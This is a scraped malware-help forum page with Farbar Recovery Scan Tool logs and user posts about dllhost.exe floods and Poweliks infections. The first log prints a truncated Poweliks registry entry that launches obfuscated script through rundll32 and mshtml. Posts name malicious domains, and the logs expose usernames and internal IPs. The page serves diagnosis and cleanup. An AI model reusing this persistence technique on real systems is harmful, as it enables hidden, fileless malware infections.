(HKLM-x32\...\Steam App 227220) (Version: - Artifice Studio)Secrets of Rætikon (HKLM-x32\...\Steam App 246680) (Version: - Broken Rules)Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003B-0000-0000-0000000FF1CE}_Office14.PRJPRO_{58FA40EF-ABA9-4FED-AD3D-318A6073934D}) (Version: - Microsoft)Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0057-0000-0000-0000000FF1CE}_Office14.VISIO_{359ADBEC-068A-4CC9-9174-77AB8EDB867A}) (Version: - Microsoft)Shadowgate (HKLM-x32\...\Steam App 294440) (Version: - Zojoi)Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.3.16540.9015 - Microsoft Corporation)Skype™ 6.20 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.)SpaceChem (HKLM-x32\...\Steam App 92800) (Version: - Zachtronics)SpinFire 9.0 Core (x32 Version: 9.0.1435.1435 - Actify, Inc) HiddenStar Wars: Knights of the Old Republic (HKLM-x32\...\Steam App 32370) (Version: - BioWare)Starbound (HKLM-x32\...\Steam App 211820) (Version: - )Steam (HKLM-x32\...\Steam) (Version: - Valve Corporation)Sunless Sea (HKLM-x32\...\Steam App 304650) (Version: - Failbetter Games)TeamSpeak 3 Client (HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\TeamSpeak 3 Client) (Version: 3.0.15 - TeamSpeak Systems GmbH)Teleglitch: Die More Edition (HKLM-x32\...\Steam App 234390) (Version: - Test3 Projects)Terraria (HKLM-x32\...\Steam App 105600) (Version: - Re-Logic)The Binding of Isaac (HKLM-x32\...\Steam App 113200) (Version: - Edmund McMillen and Florian Himsl)The Binding of Isaac: Rebirth (HKLM-x32\...\Steam App 250900) (Version: - Nicalis, Inc.)The Escapists (HKLM-x32\...\Steam App 298630) (Version: - Mouldy Toof Studios)The Secret of Monkey Island: Special Edition (HKLM-x32\...\Steam App 32360) (Version: - LucasArts)The Talos Principle Public Test (HKLM-x32\...\Steam App 330710) (Version: - Croteam)TightVNC 2.0.2 (HKLM-x32\...\TightVNC) (Version: 2.0.2 - GlavSoft LLC.)Unity Web Player (HKU\S-1-5-21-2217723503-548262416-3983414958-1007\...\UnityWebPlayer) (Version: - Unity Technologies ApS)Uplay (HKLM-x32\...\Uplay) (Version: 2.0 - Ubisoft)Valiant Hearts: The Great War™ / Soldats Inconnus : Mémoires de la Grande Guerre™ (HKLM-x32\...\Steam App 260230) (Version: - Ubisoft Montpellier)Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)Windows XP Mode (HKLM\...\{1374CC63-B520-4f3f-98E8-E9020BF01CFF}) (Version: 1.3.7600.16423 - Microsoft Corporation)World of Goo (HKLM-x32\...\Steam App 22000) (Version: - 2D BOY)Ziggurat (HKLM-x32\...\Steam App 308420) (Version: - Milkstone Studios) ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) CustomCLSID: HKU\S-1-5-21-2217723503-548262416-3983414958-1007_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? ==================== Restore Points ========================= 10-11-2014 00:40:03 Windows Update ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 21:34 - 2012-08-14 09:13 - 00000968 ____A C:\Windows\system32\Drivers\etc\hosts10.100.5.252 bmtex2010172.20.16.155 grfdfs10.100.5.50 stl2k3ns110.100.5.51 stl2k3ns210.100.5.52 stl2k3dc110.100.5.53 stl2k3dc2 ==================== Scheduled Tasks (whitelisted) ============= (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.) Task: {2F324146-BA28-46F8-A8E2-C8E487EF7EBB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-09-18] (Google Inc.)Task: {482D745E-ECAD-4DD7-ABB2-87622D2AD612} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)Task: {5447ECDB-2C78-401D-BFAE-F7C6E6F830AF} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2014-10-22] (Overwolf LTD)Task: {A9237A40-FCB0-40E2-B712-4D310799122D} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)Task: {AA3A2AC5-53FF-4D70-B6F1-39A55FA7BA06} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)Task: {AAFD7EB2-F0DF-4E39-8C89-8F15B716ED81} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)Task: {B3E7C114-D31F-402A-9253-A4FB8DCB1E3B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-09-18] (Google Inc.)Task: {DF3E1F4C-B60E-4DFD-93A5-91A4BD728439} - System32\Tasks\{44A1741A-3325-5E3D-3774-F73A5D212500} => C:\Users\Calahan\AppData\Roaming\BMMCegjc\BfVFqtQW\sSmQiMZV\HDDIaJDbA.exe <==== ATTENTIONTask: {E9004E9C-6652-4A05-ABDD-0AE18E65854F} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)Task: {EF3C8A0C-24A9-4BAE-9739-B91FE7A27393} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2013-05-13] (Microsoft)Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exeTask: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exeTask: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe ==================== Loaded Modules (whitelisted) ============= 2014-02-28 17:18 - 2014-02-28 17:18 - 00075136 _____ () C:\Windows\SysWOW64\PnkBstrA.exe2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF2010-10-20 14:23 - 2010-10-20 14:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll2010-01-02 09:42 - 2010-01-02 09:42 - 00098304 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext_64.dll2009-11-24 18:36 - 2009-11-24 18:36 - 00125440 _____ () C:\Program Files (x86)\Notepad++\NppShell_01.dll2014-06-27 17:44 - 2011-12-01 14:15 - 00777448 ____N () C:\Program Files\Plantronics\GameCom780\GameCom780.exe2012-09-13 00:38 - 2012-09-13 00:38 - 00264040 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe2014-11-10 21:15 - 2014-11-10 21:16 - 00380416 _____ () C:\Users\Calahan\Downloads\nffvqpeh.exe2014-06-27 17:44 - 2011-12-01 14:16 - 00150760 ____N () C:\Program Files\Plantronics\GameCom780\VmixPLGC.dll2012-09-13 00:38 - 2012-09-13 00:38 - 02144104 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll2012-09-13 00:38 - 2012-09-13 00:38 - 07955304 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll2012-09-13 00:38 - 2012-09-13 00:38 - 00341352 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll2012-09-13 00:38 - 2012-09-13 00:38 - 00028008 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll2012-09-13 00:38 - 2012-09-13 00:38 - 00127336 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll2012-09-13 00:39 - 2012-09-13 00:39 - 00336232 _____ () C:\Program Files (x86)\Common Files\logishrd\LWSPlugins\LWS\Applets\CameraHelper\DevManagerCore.dll2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF2010-10-20 14:45 - 2010-10-20 14:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll2011-11-08 15:46 - 2011-11-08 15:46 - 00093696 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll2014-10-29 11:26 - 2014-10-21 23:04 - 01042760 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libglesv2.dll2014-10-29 11:26 - 2014-10-21 23:04 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libegl.dll2014-10-29 11:26 - 2014-10-21 23:04 - 08910664 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\pdf.dll2014-10-29 11:26 - 2014-10-21 23:04 - 01681224 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll2014-10-29 11:26 - 2014-10-21 23:05 - 14902600 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\PepperFlash\pepflashplayer.dll ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) ==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) ==================== EXE Association (whitelisted) ============= (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) ==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) ========================= Accounts: ========================== Administrator (S-1-5-21-2217723503-548262416-3983414958-500 - Administrator - Disabled) => C:\Users\Administrator.cvci20462Calahan (S-1-5-21-2217723503-548262416-3983414958-1007 - Administrator - Enabled) => C:\Users\CalahanElisa (S-1-5-21-2217723503-548262416-3983414958-1006 - Limited - Enabled) => C:\Users\ElisaGuest (S-1-5-21-2217723503-548262416-3983414958-501 - Limited - Enabled) => C:\Users\GuestHomeGroupUser$ (S-1-5-21-2217723503-548262416-3983414958-1003 - Limited - Enabled)Logan (S-1-5-21-2217723503-548262416-3983414958-1005 - Administrator - Enabled) => C:\Users\LoganMike2 (S-1-5-21-2217723503-548262416-3983414958-1004 - Administrator - Enabled) => C:\Users\Mike2 ==================== Faulty Device Manager Devices ============= Name: PS/2 Compatible MouseDescription: PS/2 Compatible MouseClass Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}Manufacturer: MicrosoftService: i8042prtProblem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.Devices stay in this state if they have been prepared for removal.After you remove the device, this error disappears.Remove the device, and this error should be resolved. ==================== Event log errors: ========================= Application errors:==================Error: (11/10/2014 08:21:27 PM) (Source: MsiInstaller) (EventID: 1024) (User: HP8100-2)Description: Product: Adobe Reader XI - Update '{AC76BA86-7AD7-0000-2550-7A8C40011009}' could not be installed. Error code 1625. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127 Error: (11/10/2014 06:53:03 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Faulting application name: accrdsub.exe, version: 6.2.1.52, time stamp: 0x4a266469Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521eaf24Exception code: 0xc0000005Fault offset: 0x0000000000052eefFaulting process id: 0x838Faulting application start time: 0xaccrdsub.exe0Faulting application path: accrdsub.exe1Faulting module path: accrdsub.exe2Report Id: accrdsub.exe3 Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Faulting application name: iexplore.exe, version: 9.0.8112.16584, time stamp: 0x4a5bc6b7Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000Exception code: 0xc0000005Fault offset: 0x08356020Faulting process id: 0x4bcFaulting application start time: 0xiexplore.exe0Faulting application path: iexplore.exe1Faulting module path: iexplore.exe2Report Id: iexplore.exe3 Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Faulting application name: iexplore.exe, version: 9.0.8112.16584, time stamp: 0x4a5bc6b7Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000Exception code: 0xc0000005Fault offset: 0x0840e020Faulting process id: 0x2e2cFaulting application start time: 0xiexplore.exe0Faulting application path: iexplore.exe1Faulting module path: iexplore.exe2Report Id: iexplore.exe3 Error: (11/09/2014 10:44:48 PM) (Source: Application Hang) (EventID: 1002) (User: )Description: The program iexplore.exe version 9.0.8112.16584 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 2074 Start Time: 01cffc98a2a67803 Termination Time: 10 Application Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe Report Id: e82a2d01-688b-11e4-a553-6c626d9e55b8 Error: (11/09/2014 10:44:41 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Faulting application name: iexplore.exe, version: 9.0.8112.16584, time stamp: 0x541caffdFaulting module name: WININET.dll, version: 9.0.8112.16584, time stamp: 0x541cb050Exception code: 0xc0000005Fault offset: 0x000d4825Faulting process id: 0x3230Faulting application start time: 0xiexplore.exe0Faulting application path: iexplore.exe1Faulting module path: iexplore.exe2Report Id: iexplore.exe3 Error: (11/08/2014 08:45:52 PM) (Source: Application Error) (EventID: 1000) (User: )Description: Faulting application name: FalloutNV.exe, version: 1.4.0.525, time stamp: 0x4e0d50edFaulting module name: FalloutNV.exe, version: 1.4.0.525, time stamp: 0x4e0d50edException code: 0xc0000005Fault offset: 0x004232b5Faulting process id: 0x2c4cFaulting application start time: 0xFalloutNV.exe0Faulting application path: FalloutNV.exe1Faulting module path: FalloutNV.exe2Report Id: FalloutNV.exe3 Error: (11/08/2014 01:51:08 AM) (Source: Application Error) (EventID: 1000) (User: )Description: Faulting application name: chrome.exe, version: 38.0.2125.111, time stamp: 0x5447163bFaulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea8e7Exception code: 0xc0000374Fault offset: 0x000ce753Faulting process id: 0xc10Faulting application start time: 0xchrome.exe0Faulting application path: chrome.exe1Faulting module path: chrome.exe2Report Id: chrome.exe3 Error: (11/08/2014 01:39:48 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)Description: Chrome has encountered a fatal error.ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\0b75c9e6-b3bb-4218-86a6-721542ef8a63.dmp Error: (11/08/2014 01:37:18 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)Description: Chrome has encountered a fatal error.ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\d2a8414e-ff3e-46c5-b902-431b54a16fa7.dmp System errors:=============Error: (11/10/2014 08:26:58 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)Description: The following fatal alert was generated: 40. The internal error state is 252. Error: (11/10/2014 08:26:58 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)Description: The following fatal alert was generated: 40. The internal error state is 252. Error: (11/10/2014 08:22:29 PM) (Source: Service Control Manager) (EventID: 7000) (User: )Description: The HP Health Check Service service failed to start due to the following error: %%2 Error: (11/10/2014 08:21:45 PM) (Source: DCOM) (EventID: 10010) (User: )Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (11/10/2014 08:18:50 PM) (Source: Service Control Manager) (EventID: 7000) (User: )Description: The DameWare Mini Remote Control service failed to start due to the following error: %%3 Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Error: (11/10/2014 07:57:56 PM) (Source: Service Control Manager) (EventID: 7001) (User: )Description: The Computer Browser service depends on the Server service which failed to start because of the following error: %%1068 Microsoft Office Sessions:=========================Error: (11/10/2014 08:21:27 PM) (Source: MsiInstaller) (EventID: 1024) (User: HP8100-2)Description: Adobe Reader XI{AC76BA86-7AD7-0000-2550-7A8C40011009}1625(NULL)(NULL)(NULL) Error: (11/10/2014 06:53:03 PM) (Source: Application Error) (EventID: 1000) (User: )Description: accrdsub.exe6.2.1.524a266469ntdll.dll6.1.7601.18247521eaf24c00000050000000000052eef83801cff7cbaa298beaC:\Program Files\ActivIdentity\ActivClient\accrdsub.exeC:\Windows\SYSTEM32\ntdll.dllb5425d6b-6934-11e4-a553-6c626d9e55b8 Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )Description: iexplore.exe9.0.8112.165844a5bc6b7unknown0.0.0.000000000c0000005083560204bc01cffc99acb61f44C:\Program Files\Internet Explorer\iexplore.exeunknown07177948-688d-11e4-a553-6c626d9e55b8 Error: (11/09/2014 10:52:45 PM) (Source: Application Error) (EventID: 1000) (User: )Description: iexplore.exe9.0.8112.165844a5bc6b7unknown0.0.0.000000000c00000050840e0202e2c01cffc99acb58302C:\Program Files\Internet Explorer\iexplore.exeunknown0717a058-688d-11e4-a553-6c626d9e55b8 Error: (11/09/2014 10:44:48 PM) (Source: Application Hang) (EventID: 1002) (User: )Description: iexplore.exe9.0.8112.16584207401cffc98a2a6780310C:\Program Files (x86)\Internet Explorer\iexplore.exee82a2d01-688b-11e4-a553-6c626d9e55b8 Error: (11/09/2014 10:44:41 PM) (Source: Application Error) (EventID: 1000) (User: )Description: iexplore.exe9.0.8112.16584541caffdWININET.dll9.0.8112.16584541cb050c0000005000d4825323001cffc98a390db72C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\syswow64\WININET.dlle64fc0be-688b-11e4-a553-6c626d9e55b8 Error: (11/08/2014 08:45:52 PM) (Source: Application Error) (EventID: 1000) (User: )Description: FalloutNV.exe1.4.0.5254e0d50edFalloutNV.exe1.4.0.5254e0d50edc0000005004232b52c4c01cffb75dc2e1c3cC:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNV.exeC:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNV.exe2309037f-67b2-11e4-a553-6c626d9e55b8 Error: (11/08/2014 01:51:08 AM) (Source: Application Error) (EventID: 1000) (User: )Description: chrome.exe38.0.2125.1115447163bntdll.dll6.1.7601.18247521ea8e7c0000374000ce753c1001cffb1f87a3d830C:\Program Files (x86)\Google\Chrome\Application\chrome.exeC:\Windows\SysWOW64\ntdll.dll9d5c5460-6713-11e4-a553-6c626d9e55b8 Error: (11/08/2014 01:39:48 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)Description: Chrome has encountered a fatal error.ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\0b75c9e6-b3bb-4218-86a6-721542ef8a63.dmp Error: (11/08/2014 01:37:18 AM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY)Description: Chrome has encountered a fatal error.ver=38.0.2125.111;lang=;guid=31C333B4351342D580786EE8E019F187;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\d2a8414e-ff3e-46c5-b902-431b54a16fa7.dmp CodeIntegrity Errors:=================================== Date: 2011-12-05 22:19:14.852 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-05 22:10:09.618 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-05 22:03:00.342 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-05 21:51:41.439 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-05 21:41:31.323 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-01 21:31:57.630 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-01 19:53:29.363 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-12-01 18:55:19.639 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-11-30 20:37:01.322 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2011-11-30 20:22:56.207 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. ==================== Memory info =========================== Processor: Intel® Core i5 CPU 750 @ 2.67GHzPercentage of memory in use: 43%Total physical RAM: 4031.29 MBAvailable physical RAM: 2292.86 MBTotal Pagefile: 8060.76 MBAvailable Pagefile: 5054.2 MBTotal Virtual: 8192 MBAvailable Virtual: 8191.82 MB ==================== Drives ================================ Drive c: (Hard Drive) (Fixed) (Total:289.83 GB) (Free:29.36 GB) NTFSDrive d: (HP_RECOVERY) (Fixed) (Total:6.25 GB) (Free:0.77 GB) NTFS ==>[system with boot components (obtained from reading drive)]Drive f: (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS ==>[system with boot components (obtained from reading drive)]Drive g: () (Fixed) (Total:232.68 GB) (Free:9.99 GB) NTFS ==================== MBR & Partition Table ================== ========================================================Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 6233878F)Partition 1: (Active) - (Size=2 GB) - (Type=07 NTFS)Partition 2: (Not Active) - (Size=289.8 GB) - (Type=07 NTFS)Partition 3: (Not Active) - (Size=6.2 GB) - (Type=07 NTFS) ========================================================Disk: 1 (MBR Code: Windows 7 or 8) (Size: 232.8 GB) (Disk ID: 08000000)Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)Partition 3: (Not Active) - (Size=232.7 GB) - (Type=07 NTFS) ==================== End Of Log ============================
  7. Seeing a lot of dllhost.exe *32' COM Surrogate on my processes using a decent amount of memory and using bandwith. Need help fixing, antivirus is saying everything is good
  8. I have a virus of some kind on my computer. I'm getting popups stating that malicious websites are being blocked. It says the process is C:\windows\syswow64\dllhost.exe I have read through some of this forum. I tried to download the Farbar software but it says my security settings won't allow me too. Thanks for any help.
  9. For a couple of weeks, one of our users has had non-stop ESET popups informing him that "an address has been blocked." As this is happening, many dllhost.exe *32 COM Surrogate processes build up in the task manager. This problem is only present on his user account on the computer. I deleted his user profile and had him log in again. The problem cleared for almost a week before it came back. Any help ridding this computer of it would be greatly appreciated. I've run a FRST scan and attached the logs. FRST.txt Addition.txt
  10. I really need some help. After my nephew visited and downloaded some games and other things onto my computer so he could play while he was visiting, I started having problems with a slow computer. My Norton 360 kept saying it was blocking a Poweliks Trojan. I show many processes with dllhost.exe and kqikghfb.exe. If they are deleted/ended, they simply come back. I downloaded Malwarebytes, scanned, and quarantined all that showed up as needing fixed. Now, Malwarebytes is constantly blocking attacks and/or intrusions from the following: honeymods.com dllhost.exe appsruors.com Trojan.Gen.2 ffsee.com Attached are my FRST and Addition files. I would really appreciate some help! Thank you! Addition.txt FRST.txt
  11. Sorry to be a repeat of this issue, but it seems everyone is a little different. I recently was infected with a virus appearing to be called "SecurityCenter". This wasn't my first run-in with malware so I did what I know to remove it manually (av clearly failing in the first place). I was able to remove all keys and processes and nothing suspicious runs now with the exception of this dllhost issue. It only starts when Internet Explorer runs and results in many instances of the process running simultaneously, consuming resources. The processes can be stopped and everything runs normally for a while. In addition, Internet Explorer protected mode repeatedly gets turned off automatically and the home page reset to about:blank. I have completeley uninstalled IE and reinstalled with no reslution. I am running Vista x64 premium.
  12. Hello. My computer seems to have some sort of virus. I have been working profusely the past few days in an effort to fix my PC. I seem to have removed most threats, however as of right now I am receiving alerts from Malwarebytes Anti-Malware about websites and IPs (specifically fff5ee.com). Along with this, there are numerous instances of the dllhost.exe *32 process that continually show up after I end them. I ran lots of anti-malware programs, but to no avail. I have also run combofix and FRST, but nothing seems to be fixed. I have attached the logs below. All assistance is much appreciated! Addition.txt FRST.txt ComboFix.txt
  13. Help! Last evening (10-27-14), Malwarebytes started blocking numerous outgoing IP addresses while I was browsing the internet. I added them to the 'Excluded List', but my browser is S L O W. Checking my Task Manager, there are about 20 instances of DLLHOST.EXE COM Surrogate running and eating up my CPU capacity. After a little checking around, I downloaded the FARBAR RECOVERY SCAN TOOL and ran it. I tried to cut-and-paste the files in this forum, but they will not paste. I am attaching the following files if they can be used: FRST.txt Addition.txt Thanks to whoever could help with removing this annoying creature from my computer. Addition.txt FRST.txt
  14. I'm having the same problem as so many others with com surrogate using memory. I've done all I know to do for this but still no luck. Please help. Below are the results of the frst and addition files. I also installed the latest version of malwarebytes, set the settings as mentioned in other posts and ran. It found two problems in the registry so I added those to the fix list, ran the fix and then ran the program again. It doesn't find anything now. Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 26-10-2014 Ran by Jack (administrator) on JACK-PC on 26-10-2014 22:38:35 Running from E:\Storage\Downloads\Installed\Security Loaded Profile: Jack (Available profiles: Jack) Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States) Internet Explorer Version 11 Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (AMD) C:\Windows\System32\atiesrxx.exe (Check Point Software Technologies Ltd.) C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe (ABBYY) C:\Program Files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe (ArcSoft Inc.) C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe (Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe (AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe (AVAST Software) C:\Program Files\AVAST Software\Avast\afwServ.exe (Broadcom Corp.) C:\Program Files\Broadcom\BPowMon\BPowMon.exe (SEIKO EPSON CORPORATION) C:\Program Files\EPSON\EpsonCustomerParticipation\EPCP.exe (Microsoft Corporation) C:\UPS\WSTD\MSSQL.1\MSSQL\Binn\sqlservr.exe (Cyber Power Systems, Inc.) C:\Program Files (x86)\CyberPower PowerPanel Personal Edition\ppped.exe (Microsoft Corporation) C:\Program Files (x86)\MICROSOFT SQL SERVER\90\Shared\sqlbrowser.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe (Apache Software Foundation) C:\wamp\bin\apache\apache2.0.63\bin\Apache.exe (Apache Software Foundation) C:\wamp\bin\apache\apache2.0.63\bin\Apache.exe (AMD) C:\Windows\System32\atieclxx.exe (Aestan Software) C:\wamp\wampmanager.exe () C:\Program Files (x86)\AlienRespawn\Components\Scheduler\STService.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Alienware) C:\Program Files\Alienware\Alienware TactX Keyboard CI\txkbci.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe (Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe (GP Software) C:\Program Files\GPSoftware\Directory Opus\dopusrt.exe (JC&MB) C:\Program Files (x86)\Quicknote\quicknote.exe (Ritlabs S.R.L.) 